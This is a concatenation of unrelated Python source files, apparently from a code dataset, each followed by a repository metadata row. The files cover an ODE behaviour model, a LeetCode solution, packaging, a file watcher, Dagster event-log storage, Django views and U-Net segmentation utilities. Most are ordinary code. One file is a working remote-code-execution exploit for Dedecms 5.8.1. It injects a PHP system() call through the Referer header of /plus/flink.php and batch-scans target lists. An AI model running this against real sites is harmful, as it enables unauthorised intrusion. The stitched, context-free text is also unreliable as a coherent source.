logging.basicConfig(filename='src/__logs/firstOrderModel2.log',\
level=logging.DEBUG,\
format='%(asctime)s %(levelname)s:%(message)s')
from .agent_defaultPersonality import agent as agentConstructor
#GLOBAL VARS:
agent = agentConstructor()
samp = 2 #samples per time step
def fakeFunc(A,t): return -1.0 #fake function for allocating space
ETA = [integrate.odeint(fakeFunc,[0,0],linspace(0,1,10)),\
integrate.odeint(fakeFunc,[0,0],linspace(0,1,10)),\
integrate.odeint(fakeFunc,[0,0],linspace(0,1,10)),\
integrate.odeint(fakeFunc,[0,0],linspace(0,1,10)),\
integrate.odeint(fakeFunc,[0,0],linspace(0,1,10))]
XI = fakeFunc
def getEta(data,t,xi):
global samp, ETA, time, agent, XI
if t < len(data):
return data[t]
else:
XI = xi # update input function from paramteter
if len(data) == 0:
ETA0 = getInitialEta(agent.beta,agent.gamma,XI)
data.append(ETA0[:])
for T in range(len(data),t+1):
# TODO: should this be samp*t so that accuracy is not lost far from 0???
logging.info('solving ode @ t='+str(T)+', using '+str(samp)+' sub-samples')
time = linspace(0,T,samp) #(start,end,nSamples)
etadot_0 = [0,0,0,0,0] #assumption of 1st order model
#get arrays of data len=samp*t
ETA[0] = integrate.odeint(eta1Func,[data[0][0],etadot_0[0]],time)
ETA[1] = integrate.odeint(eta2Func,[data[0][1],etadot_0[1]],time)
ETA[2] = integrate.odeint(eta3Func,[data[0][2],etadot_0[2]],time)
ETA[3] = integrate.odeint(eta4Func,[data[0][3],etadot_0[3]],time)
ETA[4] = integrate.odeint(eta5Func,[data[0][4],etadot_0[4]],time)
logging.debug('len(result)='+str(len(ETA[0][:,0])))
# restructure ETA using [eta#][time , eta_or_dEta] )
E = [ETA[0][-1,0],\
ETA[1][-1,0],\
ETA[2][-1,0],\
ETA[3][-1,0],\
ETA[4][-1,0]]
data.append(E)
return data[t]
# === PRIVATE METHODS ===
def eta1Func(A,t):
#these come from calling function
global XI, agent
logging.debug( 'A='+str(A) )
eta = A[0]
etaDot=A[1]
# logging.debug( '(agent.gamma*XI(t-agent.theta)-eta)/agent.tau' )
# logging.debug( '('+str(agent.gamma[0,0])+'*'+str(XI(t-agent.theta[0])[0])+'-'+str(eta)+')/' + str(agent.tau[0]) + '=' )
etaDDot= (agent.gamma[0,0]*XI(t-agent.theta[0])[0] - eta)/agent.tau[0]
logging.debug( 'eta1etaDDot='+str(etaDDot) )
return checkValue(etaDDot)
def eta2Func(A,t):
#these come from calling function
global XI, agent
eta = A[0]
etaDot = A[1]
etaDDot= (agent.gamma[1,1]*XI(t-agent.theta[1])[1] - eta)/agent.tau[1]
return checkValue(etaDDot)
def eta3Func(A,t):
#these come from calling function
global XI, agent
eta = A[0]
etaDot = A[1]
etaDDot= (agent.gamma[2,2]*XI(t-agent.theta[2])[2] - eta)/agent.tau[2]
return checkValue(etaDDot)
def eta4Func(A,t):
#these come from calling function
global agent
eta = A[0]
etaDot = A[1]
etaDDot= ( agent.beta[3,0]*pastEta(t-agent.theta[3],0) \
+ agent.beta[3,1]*pastEta(t-agent.theta[4],1) \
+ agent.beta[3,2]*pastEta(t-agent.theta[5],2) \
- eta)/agent.tau[3]
return checkValue(etaDDot)
def eta5Func(A,t):
#these come from calling function
global agent
eta = A[0]
etaDot = A[1]
etaDDot= ( agent.beta[4,3]*pastEta(t-agent.theta[6],3) \
+ agent.beta[4,2]*pastEta(t-agent.theta[7],2) \
- eta)/agent.tau[4]
return checkValue(etaDDot)
# values cannot fall below 0! ... or can they?
def checkValue(v):
#logging.debug( 'val='+str(v) )
return v
#if v < 0 :
# return 0
#else:
# return v
#finds initial eta values based on steady-state assumption
def getInitialEta(beta,gamma,xi):
eta0 = gamma[0,0]*xi(0)[0]
eta1 = gamma[1,1]*xi(0)[1]
eta2 = gamma[2,2]*xi(0)[2]
eta3 = beta[3,0]*eta0 + beta[3,1]*eta1 + beta[3,2]*eta2
eta4 = beta[4,3]*eta3 + beta[4,2]*eta2
return array([eta0,eta1,eta2,eta3,eta4])
#function to lookup a past eta (for time delays)
def pastEta(T,etaIndex):
global ETA, samp, agent, XI
indexOfTime = int(round(T/samp))
#logging.debug( T )
if(indexOfTime<=0):
return getInitialEta(agent.beta,agent.gamma,XI);
elif indexOfTime>=len(ETA[etaIndex][:,0]):
logging.error('attempted reference to future Eta')
return ETA[etaIndex][-1,0]
else:
logging.debug( ' time:'+str(T) )
logging.debug( 'index:'+str(indexOfTime) )
logging.debug( ' len:'+str(len(ETA[etaIndex][:,0])) )
logging.debug( 'value:'+str(ETA[etaIndex][indexOfTime,0]) ) #[eta#][time , eta_or_dEta] )
return ETA[etaIndex][indexOfTime,0]
| PIELab/behaviorSim | behaviorSim/PECSagent/state/CSEL/OLD/model_firstOrder.py | model_firstOrder.py | py | 4,656 | python | en | code | 1 | github-code | 36 |
22783025748 | #
# @lc app=leetcode id=33 lang=python3
#
# [33] Search in Rotated Sorted Array
#
# https://leetcode.com/problems/search-in-rotated-sorted-array/description/
#
# algorithms
# Medium (35.70%)
# Likes: 6784
# Dislikes: 604
# Total Accepted: 902.2K
# Total Submissions: 2.5M
# Testcase Example: '[4,5,6,7,0,1,2]\n0'
#
# You are given an integer array nums sorted in ascrighting order (with distinct
# values), and an integer target.
#
# Suppose that nums is rotated at some pivot unknown to you beforehand (i.e.,
# [0,1,2,4,5,6,7] might become [4,5,6,7,0,1,2]).
#
# If target is found in the array return its index, otherwise, return -1.
#
#
# Example 1:
# Input: nums = [4,5,6,7,0,1,2], target = 0
# Output: 4
# Example 2:
# Input: nums = [4,5,6,7,0,1,2], target = 3
# Output: -1
# Example 3:
# Input: nums = [1], target = 0
# Output: -1
#
#
# Constraints:
#
#
# 1 <= nums.length <= 5000
# -10^4 <= nums[i] <= 10^4
# All values of nums are unique.
# nums is guaranteed to be rotated at some pivot.
# -10^4 <= target <= 10^4
#
#
#
# @lc code=left
class Solution:
def search(self, nums: List[int], target: int) -> int:
if not nums or len(nums) == 0:
return -1
left, right = 0, len(nums) - 1
while left + 1 < right:
mid = (left + right) // 2
if target == nums[mid]:
return mid
if nums[mid] > nums[right]:
if target >= nums[left] and target < nums[mid]:
right = mid
else:
left = mid
else:
# nums[mid] <= nums[right]
if target > nums[mid] and target <= nums[right]:
left = mid
else:
right = mid
if nums[left] == target:
return left
if nums[right] == target:
return right
return -1
# @lc code=right
| Zhenye-Na/leetcode | python/33.search-in-rotated-sorted-array.py | 33.search-in-rotated-sorted-array.py | py | 1,926 | python | en | code | 17 | github-code | 36 |
75187049704 | import os
from setuptools import setup
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
with open('requirements.txt') as fin:
lines = fin.readlines()
lines = [o.strip() for o in lines]
lines = [o for o in lines if len(o) > 0]
req = [o for o in lines if not o.startswith('#') and not o.startswith('git+')]
setup(
name = "resvit",
version = "0.1",
author = "Nghia Huynh",
author_email = "huynhnguyenhieunghia1999@gmail.com",
description = ("An package of Image Pretraining using U-Net architecture"),
packages=['resvit'],
long_description=read('README.md'),
) | nghiahuynh-ai/ResViT | setup.py | setup.py | py | 643 | python | en | code | 0 | github-code | 36 |
71782650344 | #!/usr/bin/env python
# -*- conding:utf-8 -*-
import requests
import argparse
import sys
import urllib3
import re
from prettytable import PrettyTable
urllib3.disable_warnings()
def title():
print("""
Dedecms_5.8.1 代码执行漏洞
Use:python3 dedecms_5.8.1_RCE.py
Author: Henry4E36
Github:https://github.com/Henry4E36/dedecms_5.8.1_RCE
""")
class Information(object):
def __init__(self, args):
self.args = args
self.url = args.url
self.file = args.file
def target_url(self):
target_url = self.url + "/plus/flink.php?dopost=save"
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0",
"Referer": '<?php "system"(id);?>'
}
try:
res = requests.get(url=target_url,headers=headers,verify=False,timeout=5)
if "uid" in res.text and res.status_code == 200:
pattern = re.compile(r"location='(.*)")
cmd_id = pattern.findall(res.text)[0]
return self.url, True, cmd_id
else:
return self.url, False, "NULL"
except Exception as e:
return self.url, "Error", e
def file_url(self):
file_results = []
with open(self.file, "r") as urls:
for url in urls:
url = url.strip()
if url[:4] != "http":
url = "http://" + url
self.url = url.strip()
result = Information.target_url(self)
file_results.append(result)
return file_results
if __name__ == "__main__":
title()
parser = argparse.ArgumentParser(description='Dedecms_5.8.1 代码执行漏洞')
parser.add_argument("-u", "--url", type=str, metavar="url", help="Target url eg:\"http://127.0.0.1\"")
parser.add_argument("-f", "--file", metavar="file", help="Targets in file eg:\"ip.txt\"")
args = parser.parse_args()
if len(sys.argv) != 3:
print(
"[-] 参数错误!\neg1:>>>python3 dedecms_5.8.1_RCE.py -u http://127.0.0.1\neg2:>>>python3 dedecms_5.8.1_RCE.py -f ip.txt")
elif args.url:
results = Information(args).target_url()
if results[1] is True:
print(f"\033[31m[{chr(8730)}] 目标系统: {results[-1]} 存在代码执行漏洞!\033[0m")
print(f"[{chr(8730)}] 响应为:{results[1]}")
elif results[1] is False:
print(f"[\033[31mx\033[0m] 目标系统: {results[-1]} 不存在代码执行漏洞!")
print("[" + "-" * 100 + "]")
elif results[1] == "Error":
print("[\033[31mX\033[0m] 连接错误!")
print("[" + "-"*100 + "]")
elif args.file:
results = Information(args).file_url()
k = 0
table = PrettyTable(['序号', '地址', '有无漏洞', '响应'])
for i in results:
if i[1] is True:
table.add_row([k+1, i[0], i[1], i[2]])
k = k + 1
elif i[1] is False:
table.add_row([k+1, i[0], i[1], i[2]])
k = k + 1
elif i[1] == "Error":
table.add_row([k+1, i[0], i[1], i[2]])
k = k + 1
print(table)
| Henry4E36/dedecms_5.8.1_RCE | dedecms_5.8.1_RCE.py | dedecms_5.8.1_RCE.py | py | 3,462 | python | en | code | 5 | github-code | 36 |
17173794780 | # -*- coding: utf-8 -*-
# @Time : 2019/9/10 11:21
# @Author : bjsasc
import json
import logging
import os
import sys
import time
import DataUtil
from pyinotify import WatchManager, Notifier, ProcessEvent, IN_CLOSE_WRITE
# 设置日志输出两个handle,屏幕和文件
log = logging.getLogger('file watch ---')
fp = logging.FileHandler('a.log', 'a+', encoding='utf-8')
fs = logging.StreamHandler()
log.addHandler(fs)
log.addHandler(fp)
log.setLevel(logging.DEBUG)
FILE_DIR = r'/home/bjsasc/test/' # 监听文件目录
def check_dir_exist():
"""
检查文件目录是否存在
"""
if not FILE_DIR:
log.info("The WATCH_PATH setting MUST be set.")
sys.exit()
else:
if os.path.exists(FILE_DIR):
log.info('Found watch path: path=%s.' % (FILE_DIR))
else:
log.info('The watch path NOT exists, watching stop now: path=%s.' % (FILE_DIR))
sys.exit()
def read_json_from_file(file_path):
"""
从文件中读取json数据
:param file_path:
"""
with open(file_path) as f:
s = f.read()
result = json.loads(s)
# 处理数据
for i in result:
data_process(i)
def data_process(data: dict):
"""
处理从json中读取到的数据
:param data:
"""
file_path = data["file_path"]
# 从文件名称获取文件信息
name_info = DataUtil.parse_name(file_path)
weixing_info = name_info[0]
zaihe_info = name_info[1]
# 打开文件检查
checknum = DataUtil.check_file(file_path)
# 构造保存数据库的dict
result = {}
result['type'] = '1'
result['name'] = file_path
result['suffix'] = 'fits'
result['sourcepath'] = file_path
result['checknum'] = checknum
result['status'] = '1'
# 保存数据到数据库
DataUtil.save_data(result)
# 拷贝文件
DataUtil.copy_file(file_path, file_path)
# 更新数据
DataUtil.update_date()
# 调用远程接口
DataUtil.notice(file_path)
class EventHandler(ProcessEvent):
def process_IN_CLOSE_WRITE(self, event):
"""
监听文件传输完成时间,只实现了传输完成监听
:param event:
"""
# logging.info("create file: %s " % os.path.join(event.path, event.name))
file_path = os.path.join(event.path, event.name)
time.sleep(2)
log.info('write file finished ...%s' % (file_path))
read_json_from_file(file_path)
def main():
"""
文件监听的入口程序
"""
check_dir_exist()
wm = WatchManager()
notifier = Notifier(wm, EventHandler())
wm.add_watch(FILE_DIR, IN_CLOSE_WRITE, rec=True, auto_add=True)
log.info('Now starting monitor %s' % (FILE_DIR))
notifier.loop()
if __name__ == '__main__':
main()
| xingyundeyangzhen/zxm | DataWatcher.py | DataWatcher.py | py | 2,812 | python | en | code | 0 | github-code | 36 |
495235347 | import glob
import os
import sqlite3
from collections import defaultdict
from contextlib import contextmanager
import six
import sqlalchemy as db
from sqlalchemy.pool import NullPool
from watchdog.events import PatternMatchingEventHandler
from watchdog.observers import Observer
from dagster import check
from dagster.core.serdes import ConfigurableClass, ConfigurableClassData
from dagster.utils import mkdir_p
from ...pipeline_run import PipelineRunStatus
from ...sql import (
create_engine,
get_alembic_config,
handle_schema_errors,
run_alembic_upgrade,
stamp_alembic_rev,
)
from ..base import DagsterEventLogInvalidForRun
from ..schema import SqlEventLogStorageMetadata
from ..sql_event_log import SqlEventLogStorage
class SqliteEventLogStorage(SqlEventLogStorage, ConfigurableClass):
def __init__(self, base_dir, inst_data=None):
'''Note that idempotent initialization of the SQLite database is done on a per-run_id
basis in the body of connect, since each run is stored in a separate database.'''
self._base_dir = os.path.abspath(check.str_param(base_dir, 'base_dir'))
mkdir_p(self._base_dir)
self._watchers = defaultdict(dict)
self._obs = Observer()
self._obs.start()
self._inst_data = check.opt_inst_param(inst_data, 'inst_data', ConfigurableClassData)
def upgrade(self):
all_run_ids = self.get_all_run_ids()
print(
'Updating event log storage for {n_runs} runs on disk...'.format(
n_runs=len(all_run_ids)
)
)
alembic_config = get_alembic_config(__file__)
for run_id in all_run_ids:
with self.connect(run_id) as conn:
run_alembic_upgrade(alembic_config, conn, run_id)
@property
def inst_data(self):
return self._inst_data
@classmethod
def config_type(cls):
return {'base_dir': str}
@staticmethod
def from_config_value(inst_data, config_value):
return SqliteEventLogStorage(inst_data=inst_data, **config_value)
def get_all_run_ids(self):
all_filenames = glob.glob(os.path.join(self._base_dir, '*.db'))
return [os.path.splitext(os.path.basename(filename))[0] for filename in all_filenames]
def path_for_run_id(self, run_id):
return os.path.join(self._base_dir, '{run_id}.db'.format(run_id=run_id))
def conn_string_for_run_id(self, run_id):
check.str_param(run_id, 'run_id')
return 'sqlite:///{}'.format('/'.join(self.path_for_run_id(run_id).split(os.sep)))
def _initdb(self, engine, run_id):
try:
SqlEventLogStorageMetadata.create_all(engine)
engine.execute('PRAGMA journal_mode=WAL;')
except (db.exc.DatabaseError, sqlite3.DatabaseError) as exc:
six.raise_from(DagsterEventLogInvalidForRun(run_id=run_id), exc)
alembic_config = get_alembic_config(__file__)
conn = engine.connect()
try:
stamp_alembic_rev(alembic_config, conn)
finally:
conn.close()
@contextmanager
def connect(self, run_id=None):
check.str_param(run_id, 'run_id')
conn_string = self.conn_string_for_run_id(run_id)
engine = create_engine(conn_string, poolclass=NullPool)
if not os.path.exists(self.path_for_run_id(run_id)):
self._initdb(engine, run_id)
conn = engine.connect()
try:
with handle_schema_errors(
conn,
get_alembic_config(__file__),
msg='SqliteEventLogStorage for run {run_id}'.format(run_id=run_id),
):
yield conn
finally:
conn.close()
def wipe(self):
for filename in (
glob.glob(os.path.join(self._base_dir, '*.db'))
+ glob.glob(os.path.join(self._base_dir, '*.db-wal'))
+ glob.glob(os.path.join(self._base_dir, '*.db-shm'))
):
os.unlink(filename)
def watch(self, run_id, start_cursor, callback):
watchdog = SqliteEventLogStorageWatchdog(self, run_id, callback, start_cursor)
self._watchers[run_id][callback] = (
watchdog,
self._obs.schedule(watchdog, self._base_dir, True),
)
def end_watch(self, run_id, handler):
if handler in self._watchers[run_id]:
event_handler, watch = self._watchers[run_id][handler]
self._obs.remove_handler_for_watch(event_handler, watch)
del self._watchers[run_id][handler]
class SqliteEventLogStorageWatchdog(PatternMatchingEventHandler):
def __init__(self, event_log_storage, run_id, callback, start_cursor, **kwargs):
self._event_log_storage = check.inst_param(
event_log_storage, 'event_log_storage', SqliteEventLogStorage
)
self._run_id = check.str_param(run_id, 'run_id')
self._cb = check.callable_param(callback, 'callback')
self._log_path = event_log_storage.path_for_run_id(run_id)
self._cursor = start_cursor if start_cursor is not None else -1
super(SqliteEventLogStorageWatchdog, self).__init__(patterns=[self._log_path], **kwargs)
def _process_log(self):
events = self._event_log_storage.get_logs_for_run(self._run_id, self._cursor)
self._cursor += len(events)
for event in events:
status = self._cb(event)
if status == PipelineRunStatus.SUCCESS or status == PipelineRunStatus.FAILURE:
self._event_log_storage.end_watch(self._run_id, self._cb)
def on_modified(self, event):
check.invariant(event.src_path == self._log_path)
self._process_log()
| helloworld/continuous-dagster | deploy/dagster_modules/dagster/dagster/core/storage/event_log/sqlite/sqlite_event_log.py | sqlite_event_log.py | py | 5,713 | python | en | code | 2 | github-code | 36 |
25852270022 | """Functions for dynamically loading modules and functions.
"""
import importlib
import os
__author__ = 'Hayden Metsky <hayden@mit.edu>'
def load_module_from_path(path):
"""Load Python module in the given path.
Args:
path: path to .py file
Returns:
Python module (before returning, this also executes
the module)
"""
path = os.path.abspath(path)
# Use the filename (without extension) as the module name
_, filename = os.path.split(path)
module_name, _ = os.path.splitext(filename)
spec = importlib.util.spec_from_file_location(module_name, path)
module = importlib.util.module_from_spec(spec)
# Execute the module
spec.loader.exec_module(module)
return module
def load_function_from_path(path, fn_name):
"""Load Python function in a module at the given path.
Args:
path: path to .py file
fn_name: name of function in the module
Returns:
Python function
Raises:
Exception if the module at path does not contain a function
with name fn_name
"""
module = load_module_from_path(path)
if not hasattr(module, fn_name):
raise Exception(("Module at %s does not contain function %s" %
(path, fn_name)))
return getattr(module, fn_name)
| broadinstitute/catch | catch/utils/dynamic_load.py | dynamic_load.py | py | 1,312 | python | en | code | 63 | github-code | 36 |
30586804681 | from django.contrib.formtools.wizard.views import SessionWizardView
from django.core.urlresolvers import reverse
from django.forms import modelformset_factory
from django.http import HttpResponseRedirect
from django.shortcuts import render, get_object_or_404
# Create your views here.
from recipe.forms import *
from recipe.models import Recipe
FORMS = [("recipe", RecipeForm),
("malt", modelformset_factory(MaltIL, formset=MaltFormSet, extra=3, exclude=["recipe"])),
("hops", modelformset_factory(HopsIL, formset=HopsFormSet, extra=3, exclude=["recipe"])),
("yeast", modelformset_factory(YeastIL, formset=YeastFormSet, extra=3, exclude=["recipe"]))]
class RecipeWizard(SessionWizardView):
template_name = "recipe/recipe_wizard.html"
def save_recipe(self, form_dict):
recipe = form_dict['recipe'].save()
malts = form_dict['malt'].save(commit=False)
hopss = form_dict['hops'].save(commit=False)
yeasts = form_dict['yeast'].save(commit=False)
for malt in malts:
malt.recipe = recipe
malt.save()
for hops in hopss:
hops.recipe = recipe
hops.save()
for yeast in yeasts:
yeast.recipe = recipe
yeast.save()
return recipe
def done(self, form_list, form_dict, **kwargs):
recipe = self.save_recipe(form_dict)
return HttpResponseRedirect(reverse('view_recipe', args=[recipe.id]))
def view_recipe(request, recipe_id):
recipe = get_object_or_404(klass=Recipe, pk=recipe_id)
return render(request,
'recipe/viewrecipe.html',
{
'recipe': recipe,
})
def view_all_recipes(request):
recipes = Recipe.objects.all()
return render(request,
'recipe/viewallrecipes.html',
{
'recipes': recipes,
})
def brewmaster(request, recipe_id):
recipe = get_object_or_404(klass=Recipe, pk=recipe_id)
return render(request,
'recipe/brewmaster.html',
{
'recipe': recipe,
}) | BrewRu/BrewRu | recipe/views.py | views.py | py | 2,193 | python | en | code | 0 | github-code | 36 |
1296887467 | from urllib.request import urlopen
edetabel = urlopen("https://ratings.fide.com/top.phtml?list=men")
baidid = edetabel.read()
tekst = baidid.decode()
eesnimi = str(input("Sisestage malemängja eesnimi: ")).lower()
perenimi = str(input("Sisestage malemängja perekonnanimi: ")).lower()
otsitav = perenimi.title() + ", " + eesnimi.title()
algus = tekst.index(otsitav)
temp_algus = algus + 53 + len(otsitav)
elo = tekst[temp_algus:temp_algus+4]
i = 9266
rank = 0
while i < algus:
i += 225
rank += 1
print(elo)
print(rank) | Marbeez/ez4enceenceencepoopapoopabelt | hugi.py | hugi.py | py | 539 | python | et | code | 0 | github-code | 36 |
40281118137 | import os
import time
import math
import numpy as np
import torch
import copy
from skimage import img_as_float32
import im_utils
from unet3d import UNet3D
from file_utils import ls
from torch.nn.functional import softmax
import torch.nn.functional as F
cached_model = None
cached_model_path = None
use_fake_cnn = False
def fake_cnn(tiles_for_gpu):
""" Useful debug function for checking tile layout etc """
output = []
for t in tiles_for_gpu:
v = t[0, 17:-17, 17:-17, 17:-17].data.cpu().numpy()
v_mean = np.mean(v)
output.append((v > v_mean).astype(np.int8))
return np.array(output)
def get_latest_model_paths(model_dir, k):
fnames = ls(model_dir)
fnames = sorted(fnames)[-k:]
fpaths = [os.path.join(model_dir, f) for f in fnames]
return fpaths
def load_model(model_path, classes):
global cached_model
global cached_model_path
# using cache can save up to half a second per segmentation with network drives
if model_path == cached_model_path:
return copy.deepcopy(cached_model)
# two channels as one is input image and another is some of the fg and bg annotation
# each non-empty channel in the annotation is included with 50% chance.
# Option1 - fg and bg will go in as seprate channels
# so channels are [image, fg_annot, bg_annot]
# Option2 -
# when included both fg a bg go into the model bg is -1 and fg is +1. undefined is 0
# Option 1 will be evaluated first (possibilty easier to implement)
model = UNet3D(classes, im_channels=3)
try:
model.load_state_dict(torch.load(model_path))
model = torch.nn.DataParallel(model)
# pylint: disable=broad-except, bare-except
except:
model = torch.nn.DataParallel(model)
model.load_state_dict(torch.load(model_path))
if not use_fake_cnn:
model.cuda()
# store in cache as most frequest model is laoded often
cached_model_path = model_path
cached_model = model
return copy.deepcopy(model)
def random_model(classes):
# num out channels is twice number of channels
# as we have a positive and negative output for each structure.
model = UNet3D(classes, im_channels=3)
model = torch.nn.DataParallel(model)
if not use_fake_cnn:
model.cuda()
return model
def create_first_model_with_random_weights(model_dir, classes):
# used when no model was specified on project creation.
model_num = 1
model_name = str(model_num).zfill(6)
model_name += '_' + str(int(round(time.time()))) + '.pkl'
model = random_model(classes)
model_path = os.path.join(model_dir, model_name)
torch.save(model.state_dict(), model_path)
if not use_fake_cnn:
model.cuda()
return model
def get_prev_model(model_dir, classes):
prev_path = get_latest_model_paths(model_dir, k=1)[0]
prev_model = load_model(prev_path, classes)
return prev_model, prev_path
def save_if_better(model_dir, cur_model, prev_model_path, cur_dice, prev_dice):
# convert the nans as they don't work in comparison
if math.isnan(cur_dice):
cur_dice = 0
if math.isnan(prev_dice):
prev_dice = 0
print('Validation: prev dice', str(round(prev_dice, 5)).ljust(7, '0'),
'cur dice', str(round(cur_dice, 5)).ljust(7, '0'))
if cur_dice > prev_dice:
save_model(model_dir, cur_model, prev_model_path)
return True
return False
def save_model(model_dir, cur_model, prev_model_path):
prev_model_fname = os.path.basename(prev_model_path)
prev_model_num = int(prev_model_fname.split('_')[0])
model_num = prev_model_num + 1
now = int(round(time.time()))
model_name = str(model_num).zfill(6) + '_' + str(now) + '.pkl'
model_path = os.path.join(model_dir, model_name)
print('saving', model_path, time.strftime('%H:%M:%S', time.localtime(now)))
torch.save(cur_model.state_dict(), model_path)
def ensemble_segment_3d(model_paths, image, fname, batch_size, in_w, out_w, in_d,
out_d, classes):
""" Average predictions from each model specified in model_paths """
t = time.time()
input_image_shape = image.shape
cnn = load_model(model_paths[0], classes)
in_patch_shape = (in_d, in_w, in_w)
out_patch_shape = (out_d, out_w, out_w)
depth_diff = in_patch_shape[0] - out_patch_shape[0]
height_diff = in_patch_shape[1] - out_patch_shape[1]
width_diff = in_patch_shape[2] - out_patch_shape[2]
# pad so seg will be size of input image
image = im_utils.pad_3d(image, width_diff//2, depth_diff//2,
mode='reflect', constant_values=0)
# segment returns a series of prediction maps. one for each class.
pred_maps = segment_3d(cnn, image, batch_size, in_patch_shape, out_patch_shape)
assert pred_maps[0].shape == input_image_shape
print('time to segment image', time.time() - t)
return pred_maps
def segment_3d(cnn, image, batch_size, in_tile_shape, out_tile_shape):
"""
in_tile_shape and out_tile_shape are (depth, height, width)
"""
# Return prediction for each pixel in the image
# The cnn will give a the output as channels where
# each channel corresponds to a specific class 'probability'
# don't need channel dimension
# make sure the width, height and depth is at least as big as the tile.
assert len(image.shape) == 3, str(image.shape)
assert image.shape[0] >= in_tile_shape[0], f"{image.shape[0]},{in_tile_shape[0]}"
assert image.shape[1] >= in_tile_shape[1], f"{image.shape[1]},{in_tile_shape[1]}"
assert image.shape[2] >= in_tile_shape[2], f"{image.shape[2]},{in_tile_shape[2]}"
depth_diff = in_tile_shape[0] - out_tile_shape[0]
width_diff = in_tile_shape[1] - out_tile_shape[1]
out_im_shape = (image.shape[0] - depth_diff,
image.shape[1] - width_diff,
image.shape[2] - width_diff)
coords = im_utils.get_coords_3d(out_im_shape, out_tile_shape)
coord_idx = 0
class_output_tiles = None # list of tiles for each class
while coord_idx < len(coords):
tiles_to_process = []
coords_to_process = []
for _ in range(batch_size):
if coord_idx < len(coords):
coord = coords[coord_idx]
x_coord, y_coord, z_coord = coord
tile = image[z_coord:z_coord+in_tile_shape[0],
y_coord:y_coord+in_tile_shape[1],
x_coord:x_coord+in_tile_shape[2]]
# need to add channel dimension for GPU processing.
tile = np.expand_dims(tile, axis=0)
assert tile.shape[1] == in_tile_shape[0], str(tile.shape)
assert tile.shape[2] == in_tile_shape[1], str(tile.shape)
assert tile.shape[3] == in_tile_shape[2], str(tile.shape)
tile = img_as_float32(tile)
tile = im_utils.normalize_tile(tile)
coord_idx += 1
tiles_to_process.append(tile) # need channel dimension
coords_to_process.append(coord)
tiles_to_process = np.array(tiles_to_process)
tiles_for_gpu = torch.from_numpy(tiles_to_process)
tiles_for_gpu = tiles_for_gpu.cuda()
# TODO: consider use of detach.
# I might want to move to cpu later to speed up the next few operations.
# I added .detach().cpu() to prevent a memory error.
# pad with zeros for the annotation input channels
# l,r, l,r, but from end to start w w h h d d, c, c, b, b
tiles_for_gpu = F.pad(tiles_for_gpu, (0, 0, 0, 0, 0, 0, 0, 2), 'constant', 0)
# tiles shape after padding torch.Size([4, 3, 52, 228, 228])
outputs = cnn(tiles_for_gpu).detach().cpu()
# bg channel index for each class in network output.
class_idxs = [x * 2 for x in range(outputs.shape[1] // 2)]
if class_output_tiles is None:
class_output_tiles = [[] for _ in class_idxs]
for i, class_idx in enumerate(class_idxs):
class_output = outputs[:, class_idx:class_idx+2]
# class_output : (batch_size, bg/fg, depth, height, width)
softmaxed = softmax(class_output, 1)
foreground_probs = softmaxed[:, 1] # just the foreground probability.
predicted = foreground_probs > 0.5
predicted = predicted.int()
pred_np = predicted.data.cpu().numpy()
for out_tile in pred_np:
class_output_tiles[i].append(out_tile)
class_pred_maps = []
for i, output_tiles in enumerate(class_output_tiles):
# reconstruct for each class
reconstructed = im_utils.reconstruct_from_tiles(output_tiles,
coords, out_im_shape)
class_pred_maps.append(reconstructed)
return class_pred_maps
| YZST/RootPainter3D | trainer/model_utils.py | model_utils.py | py | 8,983 | python | en | code | null | github-code | 36 |
35936630793 | #!/usr/bin/python3
i = 1 #zaczynamy od 1
while i < 40:
print(i)#wypisuje cyferki
if i % 5 == 0 and i % 7 == 0: #najpierw to, bo inaczej napisze tylko, zę jest podzielne przez 5
print("x is divided by 5 and 7")
elif i % 5 == 0: #czy reszta z dzielenia jest równa 0
print("x is divided by 5")
elif i % 7 == 0:
print("x is divided by 7")
elif i == 13:
i=i+1 # zwiększam licznik pętli, jeśli będzie 13
continue #pomijanie 13
elif i % 5 != 0 and i % 7 != 0: #!= - różne od (przeciwieństwo ==)
print("x is not important")
i=i+1 #zwiększam licznik pętli
input() | AgaSuder/kurs_Python | homework3/zadanie3_2b.py | zadanie3_2b.py | py | 652 | python | pl | code | 0 | github-code | 36 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.